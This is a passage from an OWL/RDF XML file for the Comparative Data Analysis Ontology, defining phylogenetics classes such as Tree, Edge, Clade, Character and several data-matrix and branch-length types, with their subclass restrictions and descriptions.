<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000157"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000110"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000045 -->
<owl:Class rdf:about="&obo;CDAO_0000045">
<rdfs:label rdf:datatype="&xsd;string">Standard</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000046 -->
<owl:Class rdf:about="&obo;CDAO_0000046">
<rdfs:label rdf:datatype="&xsd;string">EdgeLength</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000101"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000176"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000063"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000215"/>
<owl:someValuesFrom rdf:resource="&rdfs;Literal"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:comment>It is possible that this should not be classed as an 'annotation' since it contains data rather than meta-data.</rdfs:comment>
<dc:description>The length of an edge (branch) of a Tree or Network, typically in units of evolutionary changes in character-state per character.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000047 -->
<owl:Class rdf:about="&obo;CDAO_0000047">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000048 -->
<owl:Class rdf:about="&obo;CDAO_0000048">
<rdfs:label rdf:datatype="&xsd;string">Clade</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000129"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000049 -->
<owl:Class rdf:about="&obo;CDAO_0000049">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharParsimonyLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000050 -->
<owl:Class rdf:about="&obo;CDAO_0000050">
<rdfs:label rdf:datatype="&xsd;string">MolecularStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000051 -->
<owl:Class rdf:about="&obo;CDAO_0000051">
<rdfs:label rdf:datatype="&xsd;string">PolyphyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000188"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000127"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000052 -->
<owl:Class rdf:about="&obo;CDAO_0000052">
<rdfs:label rdf:datatype="&xsd;string">NexusDataBlock</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000053 -->
<owl:Class rdf:about="&obo;CDAO_0000053">
<rdfs:label rdf:datatype="&xsd;string">BranchingNode</rdfs:label>
<owl:equivalentClass>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
<owl:minCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:minCardinality>
</owl:Restriction>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000055 -->
<owl:Class rdf:about="&obo;CDAO_0000055">
<rdfs:label rdf:datatype="&xsd;string">Compound</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000056 -->
<owl:Class rdf:about="&obo;CDAO_0000056">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000025"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000208"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000138"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000142"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000071"/>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A matrix of character-state data, typically containing observed data, though in some cases the states in the matrix might be simulated or hypothetical. Synonyms: character Data matrix, character-state matrix</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000057 -->
<owl:Class rdf:about="&obo;CDAO_0000057">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000058 -->
<owl:Class rdf:about="&obo;CDAO_0000058">
<rdfs:label rdf:datatype="&xsd;string">TimeCalibratedLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000059 -->
<owl:Class rdf:about="&obo;CDAO_0000059">
<rdfs:label rdf:datatype="&xsd;string">SetOfNodes</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000118"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000198"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000060 -->
<owl:Class rdf:about="&obo;CDAO_0000060">
<rdfs:label rdf:datatype="&xsd;string">MRCANode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000080"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000163"/>
<owl:onClass rdf:resource="&obo;CDAO_0000118"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000061 -->
<owl:Class rdf:about="&obo;CDAO_0000061">
<rdfs:label rdf:datatype="&xsd;string">FASTADataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000062 -->
<owl:Class rdf:about="&obo;CDAO_0000062">
<rdfs:label rdf:datatype="&xsd;string">evolutionaryTransition</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000065"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000159"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000186"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000169"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000063 -->
<owl:Class rdf:about="&obo;CDAO_0000063">
<rdfs:label rdf:datatype="&xsd;string">EdgeLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000064 -->
<owl:Class rdf:about="&obo;CDAO_0000064">
<rdfs:label rdf:datatype="&xsd;string">cladogeneticChange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000065 -->
<owl:Class rdf:about="&obo;CDAO_0000065">
<rdfs:label rdf:datatype="&xsd;string">anageneticChange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000066 -->
<owl:Class rdf:about="&obo;CDAO_0000066">
<rdfs:label rdf:datatype="&xsd;string">TUAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000067 -->
<owl:Class rdf:about="&obo;CDAO_0000067">
<rdfs:label rdf:datatype="&xsd;string">PhyloTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000068 -->
<owl:Class rdf:about="&obo;CDAO_0000068">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000071"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000207"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000019"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000019"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000069 -->
<owl:Class rdf:about="&obo;CDAO_0000069">
<rdfs:label rdf:datatype="&xsd;string">PHYLIPTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000070 -->
<owl:Class rdf:about="&obo;CDAO_0000070">
<rdfs:label rdf:datatype="&xsd;string">Subtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000155"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000110"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000071 -->
<owl:Class rdf:about="&obo;CDAO_0000071">
<rdfs:label rdf:datatype="&xsd;string">Character</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000098"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:comment rdf:datatype="&xsd;string">Traits shown to be relevant for phylogenetic classification</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000072 -->
<owl:Class rdf:about="&obo;CDAO_0000072">
<rdfs:label rdf:datatype="&xsd;string">GalledTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000073 -->
<owl:Class rdf:about="&obo;CDAO_0000073">
<rdfs:label rdf:datatype="&xsd;string">SpeciesTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000074 -->
<owl:Class rdf:about="&obo;CDAO_0000074">
<rdfs:label rdf:datatype="&xsd;string">TreeFormat</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000044"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000075 -->
<owl:Class rdf:about="&obo;CDAO_0000075">
<rdfs:label rdf:datatype="&xsd;string">StandardCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000076 -->
<owl:Class rdf:about="&obo;CDAO_0000076">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
<dc:description>This class will be declared equivalent to the imported amino acid class description</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000077 -->
<owl:Class rdf:about="&obo;CDAO_0000077">
<rdfs:label rdf:datatype="&xsd;string">geneDuplication</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000078 -->
<owl:Class rdf:about="&obo;CDAO_0000078">
<rdfs:label rdf:datatype="&xsd;string">CompoundCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000170"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000136"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000142"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000071"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000136"/>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A character that could be divided into separate characters but is not due to the non-independence of changes that would result, e.g., as in the case of a subsequence that is either present or absent as a block.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000079 -->
<owl:Class rdf:about="&obo;CDAO_0000079">
<rdfs:label rdf:datatype="&xsd;string">SIMMAPTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000080 -->
<owl:Class rdf:about="&obo;CDAO_0000080">
<rdfs:label rdf:datatype="&xsd;string">CommonAncestralNode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<rdfs:subClassOf>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000053"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000174"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000053"/>
</owl:Restriction>
</owl:unionOf>
</owl:Class>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000081 -->
<owl:Class rdf:about="&obo;CDAO_0000081">
<rdfs:label rdf:datatype="&xsd;string">NewickTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000082 -->
<owl:Class rdf:about="&obo;CDAO_0000082">
<rdfs:label rdf:datatype="&xsd;string">TimeProportionalLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000083 -->
<owl:Class rdf:about="&obo;CDAO_0000083">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharDistanceLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000084 -->
<owl:Class rdf:about="&obo;CDAO_0000084">
<rdfs:label rdf:datatype="&xsd;string">StarTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000149"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000108"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000085 -->
<owl:Class rdf:about="&obo;CDAO_0000085">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedUnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000018"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000086 -->
<owl:Class rdf:about="&obo;CDAO_0000086">
<rdfs:label rdf:datatype="&xsd;string">ParaphyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000127"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000199"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000070"/>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000129"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000087 -->
<owl:Class rdf:about="&obo;CDAO_0000087">
<rdfs:label rdf:datatype="&xsd;string">geneticEvent</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000041"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000088 -->
<owl:Class rdf:about="&obo;CDAO_0000088">
<rdfs:label rdf:datatype="&xsd;string">UnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000089 -->
<owl:Class rdf:about="&obo;CDAO_0000089">
<rdfs:label rdf:datatype="&xsd;string">CategoricalStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000098"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000090 -->
<owl:Class rdf:about="&obo;CDAO_0000090">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharLikelihoodLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000091 -->
<owl:Class rdf:about="&obo;CDAO_0000091">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDomain</rdfs:label>
<dc:description>The universe of possible states for a particular type of character, e.g., the states of an Amino_Acid character come from the Amino_Acid domain.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000092 -->
<owl:Class rdf:about="&obo;CDAO_0000092">
<rdfs:label rdf:datatype="&xsd;string">CoordinateList</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000093 -->
<owl:Class rdf:about="&obo;CDAO_0000093">
<rdfs:label rdf:datatype="&xsd;string">GammaDistribution</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000094 -->
<owl:Class rdf:about="&obo;CDAO_0000094">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000195"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000002"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000002"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000095 -->
<owl:Class rdf:about="&obo;CDAO_0000095">
<rdfs:label rdf:datatype="&xsd;string">CoordinateRange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000096 -->
<owl:Class rdf:about="&obo;CDAO_0000096">
<rdfs:label rdf:datatype="&xsd;string">ReticulateEvolution</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000097 -->
<owl:Class rdf:about="&obo;CDAO_0000097">
<rdfs:label rdf:datatype="&xsd;string">hereditaryChange</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000186"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000159"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000169"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000098 -->
<owl:Class rdf:about="&obo;CDAO_0000098">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000205"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000191"/>
<owl:onClass rdf:resource="&obo;CDAO_0000138"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>The instance of a given character for a given TU. Its state is an object property drawn from a particular character state domain, e.g., the state of an Amino_Acid_State_Datum is an object property drawn from the domain Amino_Acid.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000099 -->
<owl:Class rdf:about="&obo;CDAO_0000099">
<rdfs:label rdf:datatype="&xsd;string">Edge</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000193"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000101"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000162"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>An edge connecting two nodes in a (Phylogenetic) Tree or Network, also known as a 'branch'. Edges may have attributes such as length, degree of support, and direction. An edge can be a surrogate for a 'split' or bipartition, since each edge in a tree divides the terminal nodes into two sets.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000100 -->
<owl:Class rdf:about="&obo;CDAO_0000100">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharacterLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000101 -->
<owl:Class rdf:about="&obo;CDAO_0000101">
<rdfs:label rdf:datatype="&xsd;string">EdgeAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000102 -->
<owl:Class rdf:about="&obo;CDAO_0000102">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedRootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000018"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000033"/>
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000108"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000103 -->
<owl:Class rdf:about="&obo;CDAO_0000103">
<rdfs:label rdf:datatype="&xsd;string">GrafenLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000104 -->
<owl:Class rdf:about="&obo;CDAO_0000104">
<rdfs:label rdf:datatype="&xsd;string">CoordinateSystem</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<dc:description>A reference to an external coordinate system. Coordinates for data must refer to some such external coordinate system.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000105 -->
<owl:Class rdf:about="&obo;CDAO_0000105">
<rdfs:label rdf:datatype="&xsd;string">GenBankDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000107 -->
<owl:Class rdf:about="&obo;CDAO_0000107">
<rdfs:label rdf:datatype="&xsd;string">DataMatrixFormat</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000025"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000108 -->
<owl:Class rdf:about="&obo;CDAO_0000108">
<rdfs:label rdf:datatype="&xsd;string">TerminalNode</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:intersectionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000149"/>
<owl:allValuesFrom>
<owl:Class>
<owl:complementOf rdf:resource="&obo;CDAO_0000140"/>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</owl:intersectionOf>
</owl:Class>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000140"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000109 -->
<owl:Class rdf:about="&obo;CDAO_0000109">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000057"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000110 -->
<owl:Class rdf:about="&obo;CDAO_0000110">
<rdfs:label rdf:datatype="&xsd;string">Tree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000111 -->
<owl:Class rdf:about="&obo;CDAO_0000111">
<rdfs:label rdf:datatype="&xsd;string">CategoricalCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000071"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000112 -->
<owl:Class rdf:about="&obo;CDAO_0000112">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000113 -->
<owl:Class rdf:about="&obo;CDAO_0000113">
<rdfs:label rdf:datatype="&xsd;string">PHYLIPDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000114 -->
<owl:Class rdf:about="&obo;CDAO_0000114">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharLikelihoodLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000009"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000115 -->
<owl:Class rdf:about="&obo;CDAO_0000115">
